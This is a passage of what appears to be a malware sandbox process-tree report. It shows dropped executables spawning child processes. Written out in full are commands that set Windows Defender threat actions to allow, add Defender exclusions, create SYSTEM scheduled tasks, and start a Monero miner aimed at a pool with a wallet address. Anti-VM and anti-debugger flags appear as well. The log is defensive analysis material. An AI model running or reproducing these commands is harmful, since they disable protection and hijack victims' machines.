                                                              • Command and Scripting Interpreter: PowerShell
                                                              PID:4580
                                                            • C:\Users\Admin\Pictures\FlHiR9xpWYhRqycidEY193sD.exe
                                                              "C:\Users\Admin\Pictures\FlHiR9xpWYhRqycidEY193sD.exe"
                                                              10⤵
                                                                PID:5924
                                                            • C:\Users\Admin\Pictures\4qr8a7wdg8ZGAzWBvkAFxqAb.exe
                                                              "C:\Users\Admin\Pictures\4qr8a7wdg8ZGAzWBvkAFxqAb.exe"
                                                              9⤵
                                                              • Executes dropped EXE
                                                              PID:3464
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -nologo -noprofile
                                                                10⤵
                                                                • Command and Scripting Interpreter: PowerShell
                                                                PID:3436
                                                              • C:\Users\Admin\Pictures\4qr8a7wdg8ZGAzWBvkAFxqAb.exe
                                                                "C:\Users\Admin\Pictures\4qr8a7wdg8ZGAzWBvkAFxqAb.exe"
                                                                10⤵
                                                                  PID:4488
                                                              • C:\Users\Admin\Pictures\yFx4uQIoSXu0m1gDbyX2hsHV.exe
                                                                "C:\Users\Admin\Pictures\yFx4uQIoSXu0m1gDbyX2hsHV.exe"
                                                                9⤵
                                                                • Executes dropped EXE
                                                                PID:952
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -nologo -noprofile
                                                                  10⤵
                                                                  • Command and Scripting Interpreter: PowerShell
                                                                  PID:2964
                                                                • C:\Users\Admin\Pictures\yFx4uQIoSXu0m1gDbyX2hsHV.exe
                                                                  "C:\Users\Admin\Pictures\yFx4uQIoSXu0m1gDbyX2hsHV.exe"
                                                                  10⤵
                                                                    PID:5952
                                                                • C:\Users\Admin\Pictures\U8vf8rJTmNNPcAyfafgEXsK8.exe
                                                                  "C:\Users\Admin\Pictures\U8vf8rJTmNNPcAyfafgEXsK8.exe"
                                                                  9⤵
                                                                  • Executes dropped EXE
                                                                  PID:1448
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -nologo -noprofile
                                                                    10⤵
                                                                    • Command and Scripting Interpreter: PowerShell
                                                                    PID:2288
                                                                  • C:\Users\Admin\Pictures\U8vf8rJTmNNPcAyfafgEXsK8.exe
                                                                    "C:\Users\Admin\Pictures\U8vf8rJTmNNPcAyfafgEXsK8.exe"
                                                                    10⤵
                                                                      PID:5204
                                                                  • C:\Users\Admin\Pictures\YPvckKCypmBOW0NpRBKcRmjU.exe
                                                                    "C:\Users\Admin\Pictures\YPvckKCypmBOW0NpRBKcRmjU.exe"
                                                                    9⤵
                                                                    • Modifies firewall policy service
                                                                    • Executes dropped EXE
                                                                    • Drops file in System32 directory
                                                                    PID:1728
                                                                  • C:\Users\Admin\Pictures\9hs3wfYjijM3ppotMilPLHzJ.exe
                                                                    "C:\Users\Admin\Pictures\9hs3wfYjijM3ppotMilPLHzJ.exe"
                                                                    9⤵
                                                                    • Executes dropped EXE
                                                                    PID:2708
                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS3F51.tmp\Install.exe
                                                                      .\Install.exe /tEdidDDf "385118" /S
                                                                      10⤵
                                                                      • Checks BIOS information in registry
                                                                      • Executes dropped EXE
                                                                      • Enumerates system info in registry
                                                                      PID:3892
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                        11⤵
                                                                          PID:1332
                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                            12⤵
                                                                              PID:4448
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                13⤵
                                                                                  PID:2172
                                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                    14⤵
                                                                                      PID:2908
                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                  forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                  12⤵
                                                                                    PID:1492
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                      13⤵
                                                                                        PID:2772
                                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                          14⤵
                                                                                            PID:2852
                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                        12⤵
                                                                                          PID:2348
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                            13⤵
                                                                                              PID:1124
                                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                14⤵
                                                                                                  PID:4964
                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                              forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                              12⤵
                                                                                                PID:4480
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                  13⤵
                                                                                                    PID:2236
                                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                      14⤵
                                                                                                        PID:3032
                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                    12⤵
                                                                                                      PID:4568
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                        13⤵
                                                                                                          PID:3872
                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                            14⤵
                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            PID:2200
                                                                                                            • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                              "C:\Windows\system32\gpupdate.exe" /force
                                                                                                              15⤵
                                                                                                                PID:3644
                                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                                        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                                                                                        11⤵
                                                                                                          PID:2080
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                            12⤵
                                                                                                              PID:5072
                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                                13⤵
                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                PID:4488
                                                                                                                • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                  "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                                  14⤵
                                                                                                                    PID:5580
                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                              schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 22:41:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS3F51.tmp\Install.exe\" it /WWMdidCFzX 385118 /S" /V1 /F
                                                                                                              11⤵
                                                                                                              • Creates scheduled task(s)
                                                                                                              PID:5596
                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                              "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
                                                                                                              11⤵
                                                                                                                PID:5988
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
                                                                                                                  12⤵
                                                                                                                    PID:6112
                                                                                                                    • \??\c:\windows\SysWOW64\schtasks.exe
                                                                                                                      schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
                                                                                                                      13⤵
                                                                                                                        PID:5436
                                                                                                              • C:\Users\Admin\Pictures\jbN5ulvXWgLaRW8vEeYfydH2.exe
                                                                                                                "C:\Users\Admin\Pictures\jbN5ulvXWgLaRW8vEeYfydH2.exe"
                                                                                                                9⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:3156
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS4F01.tmp\Install.exe
                                                                                                                  .\Install.exe /tEdidDDf "385118" /S
                                                                                                                  10⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:5088
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                    11⤵
                                                                                                                      PID:2332
                                                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                        12⤵
                                                                                                                          PID:3192
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                            13⤵
                                                                                                                              PID:916
                                                                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                14⤵
                                                                                                                                  PID:4620
                                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                              forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                              12⤵
                                                                                                                                PID:2172
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                  13⤵
                                                                                                                                    PID:1492
                                                                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                      14⤵
                                                                                                                                        PID:3872
                                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                                    12⤵
                                                                                                                                      PID:5416
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                        13⤵
                                                                                                                                          PID:5436
                                                                                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                            14⤵
                                                                                                                                              PID:5452
                                                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                          forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                                          12⤵
                                                                                                                                            PID:5676
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                              13⤵
                                                                                                                                                PID:5800
                                                                                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                  14⤵
                                                                                                                                                    PID:5996
                                                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                12⤵
                                                                                                                                                  PID:4356
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                    13⤵
                                                                                                                                                      PID:5352
                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                        14⤵
                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                        PID:5596
                                                                                                                                                        • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                                          "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                          15⤵
                                                                                                                                                            PID:5636
                                                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                    "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                                                                                                                                    11⤵
                                                                                                                                                      PID:5720
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                                                                        12⤵
                                                                                                                                                          PID:5872
                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                                                                            13⤵
                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                            PID:5920
                                                                                                                                                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                              "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                                                                              14⤵
                                                                                                                                                                PID:6008
                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                          schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 22:41:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS4F01.tmp\Install.exe\" it /DXFdidLDYA 385118 /S" /V1 /F
                                                                                                                                                          11⤵
                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                          PID:5396
                                                                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
                                                                                                                                                          11⤵
                                                                                                                                                            PID:5564
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
                                                                                                                                                              12⤵
                                                                                                                                                                PID:5900
                                                                                                                                                                • \??\c:\windows\SysWOW64\schtasks.exe
                                                                                                                                                                  schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
                                                                                                                                                                  13⤵
                                                                                                                                                                    PID:6128
                                                                                                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                                                                                                                                                          8⤵
                                                                                                                                                            PID:3552
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1000014001\deat.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\1000014001\deat.exe"
                                                                                                                                                      5⤵
                                                                                                                                                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                      PID:2608
                                                                                                                                                • C:\Users\Admin\1000006002\794bca3438.exe
                                                                                                                                                  "C:\Users\Admin\1000006002\794bca3438.exe"
                                                                                                                                                  3⤵
                                                                                                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                  PID:4436
                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2652 -ip 2652
                                                                                                                                              1⤵
                                                                                                                                                PID:1524
                                                                                                                                              • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                                                                                "C:\Program Files (x86)\GameSyncLink\GameService.exe"
                                                                                                                                                1⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                PID:3444
                                                                                                                                                • C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
                                                                                                                                                  "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
                                                                                                                                                  2⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  PID:796
                                                                                                                                                  • C:\Windows\Temp\368918.exe
                                                                                                                                                    "C:\Windows\Temp\368918.exe" --list-devices
                                                                                                                                                    3⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                    PID:1204
                                                                                                                                              • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                                                                                "C:\Program Files (x86)\GameSyncLink\GameService.exe"
                                                                                                                                                1⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                PID:3424
                                                                                                                                                • C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe
                                                                                                                                                  "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
                                                                                                                                                  2⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  PID:4332
                                                                                                                                              • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                                                                                "C:\Program Files (x86)\GameSyncLink\GameService.exe"
                                                                                                                                                1⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                PID:4700
                                                                                                                                                • C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe
                                                                                                                                                  "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
                                                                                                                                                  2⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                                  PID:1068
                                                                                                                                                  • C:\Windows\Temp\910402.exe
                                                                                                                                                    "C:\Windows\Temp\910402.exe" --http-port 14343 -o xmr.2miners.com:2222 -u 83dQM82bj4yY83XKGKHnbHTzqgY4FUt2pi1JS15u7rTs8v84mTU5ny5MiRoSeyduBUAQKFZ6MsvbMHYTisNeThDM3BqQ59y --coin XMR -t 1 --no-color -p x
                                                                                                                                                    3⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                                    PID:884
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
                                                                                                                                                1⤵
                                                                                                                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Identifies Wine through registry keys
                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                PID:5052
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
                                                                                                                                                1⤵
                                                                                                                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Identifies Wine through registry keys
                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                PID:1244
                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 4464 -ip 4464
                                                                                                                                                1⤵
                                                                                                                                                  PID:4580
                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 4464 -ip 4464
                                                                                                                                                  1⤵
                                                                                                                                                    PID:3060
                                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                                    1⤵
                                                                                                                                                      PID:1340
                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                      C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                                                      1⤵
                                                                                                                                                        PID:908
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
                                                                                                                                                        1⤵
                                                                                                                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Identifies Wine through registry keys
                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                        PID:856
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
                                                                                                                                                        1⤵
                                                                                                                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Identifies Wine through registry keys
                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                        PID:984
                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 3592 -ip 3592
                                                                                                                                                        1⤵
                                                                                                                                                          PID:1532
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS3F51.tmp\Install.exe
                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7zS3F51.tmp\Install.exe it /WWMdidCFzX 385118 /S
                                                                                                                                                          1⤵
                                                                                                                                                            PID:5544
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                              2⤵
                                                                                                                                                                PID:5232
                                                                                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                  forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:5452
                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                      4⤵
                                                                                                                                                                        PID:5444
                                                                                                                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                          5⤵
                                                                                                                                                                            PID:224
                                                                                                                                                                      • C:\Windows\SysWOW64\forfiles.exe
